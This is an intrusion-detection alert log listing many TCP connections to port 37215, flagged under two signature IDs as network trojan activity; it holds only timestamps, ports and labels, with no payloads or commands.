                  Timestamp:07/10/24-08:27:24.954167
                  SID:2835222
                  Source Port:42912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.933010
                  SID:2829579
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.978866
                  SID:2835222
                  Source Port:45728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.879999
                  SID:2835222
                  Source Port:60250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2829579
                  Source Port:51512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:47996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.152764
                  SID:2829579
                  Source Port:53864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479051
                  SID:2835222
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2835222
                  Source Port:46176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202822
                  SID:2829579
                  Source Port:33362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626199
                  SID:2829579
                  Source Port:54428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016276
                  SID:2835222
                  Source Port:46680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.862636
                  SID:2829579
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192940
                  SID:2829579
                  Source Port:46016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.745002
                  SID:2835222
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881342
                  SID:2835222
                  Source Port:33558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576157
                  SID:2835222
                  Source Port:49830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2835222
                  Source Port:59578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.863251
                  SID:2835222
                  Source Port:56126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.263380
                  SID:2835222
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623899
                  SID:2829579
                  Source Port:36888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2835222
                  Source Port:58858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2835222
                  Source Port:33662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.121414
                  SID:2829579
                  Source Port:38798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2835222
                  Source Port:53256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2835222
                  Source Port:46458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949223
                  SID:2829579
                  Source Port:33026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069203
                  SID:2835222
                  Source Port:58218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2835222
                  Source Port:43534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2835222
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2829579
                  Source Port:54622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2835222
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597070
                  SID:2835222
                  Source Port:42336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.051203
                  SID:2835222
                  Source Port:49120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2835222
                  Source Port:53334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2835222
                  Source Port:42354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442077
                  SID:2829579
                  Source Port:38944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2835222
                  Source Port:55968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2829579
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2829579
                  Source Port:52314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.754443
                  SID:2835222
                  Source Port:47438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:48586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994858
                  SID:2829579
                  Source Port:56646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2829579
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870525
                  SID:2835222
                  Source Port:60984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909294
                  SID:2835222
                  Source Port:50882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135009
                  SID:2829579
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616145
                  SID:2829579
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.504435
                  SID:2835222
                  Source Port:52868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:58624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865021
                  SID:2835222
                  Source Port:47966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2829579
                  Source Port:59706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2835222
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.581201
                  SID:2829579
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573174
                  SID:2829579
                  Source Port:55628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2835222
                  Source Port:57910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2835222
                  Source Port:56282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2829579
                  Source Port:59102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402953
                  SID:2835222
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.838490
                  SID:2829579
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.791528
                  SID:2835222
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2829579
                  Source Port:44456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.620674
                  SID:2829579
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2829579
                  Source Port:60312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.953647
                  SID:2829579
                  Source Port:32828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.476380
                  SID:2835222
                  Source Port:55268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2829579
                  Source Port:34824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190814
                  SID:2829579
                  Source Port:51542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2829579
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903696
                  SID:2829579
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449292
                  SID:2835222
                  Source Port:44934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2835222
                  Source Port:41574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648560
                  SID:2835222
                  Source Port:36088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2829579
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554172
                  SID:2829579
                  Source Port:45432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946860
                  SID:2835222
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251063
                  SID:2829579
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.173873
                  SID:2835222
                  Source Port:46808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2829579
                  Source Port:37172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420785
                  SID:2829579
                  Source Port:52154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437179
                  SID:2829579
                  Source Port:48868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:32928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.240664
                  SID:2835222
                  Source Port:43686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2835222
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2835222
                  Source Port:49068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.176375
                  SID:2829579
                  Source Port:40368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997409
                  SID:2829579
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.439171
                  SID:2829579
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503899
                  SID:2829579
                  Source Port:35104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.779688
                  SID:2829579
                  Source Port:55378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2835222
                  Source Port:55362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2829579
                  Source Port:56596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2829579
                  Source Port:44992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833150
                  SID:2835222
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440414
                  SID:2835222
                  Source Port:45110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.640181
                  SID:2835222
                  Source Port:52520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.914013
                  SID:2829579
                  Source Port:43620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2835222
                  Source Port:33326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.477579
                  SID:2829579
                  Source Port:35130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.055054
                  SID:2835222
                  Source Port:38080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393644
                  SID:2835222
                  Source Port:47522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.767946
                  SID:2829579
                  Source Port:33072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2835222
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2835222
                  Source Port:50426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151316
                  SID:2829579
                  Source Port:36216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2835222
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.857933
                  SID:2829579
                  Source Port:44508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2829579
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.917440
                  SID:2835222
                  Source Port:58666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2829579
                  Source Port:36830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.915722
                  SID:2829579
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2829579
                  Source Port:52914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564654
                  SID:2835222
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668582
                  SID:2829579
                  Source Port:39880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2835222
                  Source Port:58998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192940
                  SID:2835222
                  Source Port:60456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833151
                  SID:2835222
                  Source Port:46880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2829579
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2835222
                  Source Port:37182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.880984
                  SID:2829579
                  Source Port:47440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.395679
                  SID:2829579
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.700993
                  SID:2829579
                  Source Port:45658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2829579
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538016
                  SID:2835222
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2835222
                  Source Port:57174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828950
                  SID:2835222
                  Source Port:51560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300900
                  SID:2829579
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.904469
                  SID:2835222
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859325
                  SID:2829579
                  Source Port:49298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810780
                  SID:2835222
                  Source Port:52498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476661
                  SID:2829579
                  Source Port:42908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2835222
                  Source Port:58838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2835222
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2835222
                  Source Port:50990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2829579
                  Source Port:44844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2835222
                  Source Port:40344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835498
                  SID:2829579
                  Source Port:47168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2835222
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.390670
                  SID:2835222
                  Source Port:45764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.454232
                  SID:2829579
                  Source Port:58664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2835222
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.123871
                  SID:2829579
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196006
                  SID:2829579
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204564
                  SID:2835222
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2835222
                  Source Port:49244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:43332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2835222
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.352797
                  SID:2835222
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801971
                  SID:2835222
                  Source Port:42148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.902162
                  SID:2835222
                  Source Port:37994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2829579
                  Source Port:41154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440683
                  SID:2835222
                  Source Port:39994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657452
                  SID:2835222
                  Source Port:55756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2835222
                  Source Port:40398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538368
                  SID:2829579
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2835222
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2835222
                  Source Port:41572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2829579
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2829579
                  Source Port:55810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2829579
                  Source Port:58848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2829579
                  Source Port:38308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2835222
                  Source Port:57796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2835222
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190530
                  SID:2829579
                  Source Port:55294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.148686
                  SID:2835222
                  Source Port:34416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998912
                  SID:2835222
                  Source Port:46558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.200630
                  SID:2829579
                  Source Port:55840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.216648
                  SID:2829579
                  Source Port:38626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2829579
                  Source Port:33800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.144044
                  SID:2835222
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502478
                  SID:2829579
                  Source Port:39100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909611
                  SID:2829579
                  Source Port:47008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.081335
                  SID:2835222
                  Source Port:59322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2829579
                  Source Port:39644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2835222
                  Source Port:39748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.300149
                  SID:2835222
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161578
                  SID:2829579
                  Source Port:46678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2829579
                  Source Port:53166
                  Destination Port:37215
                  Protocol:TCP
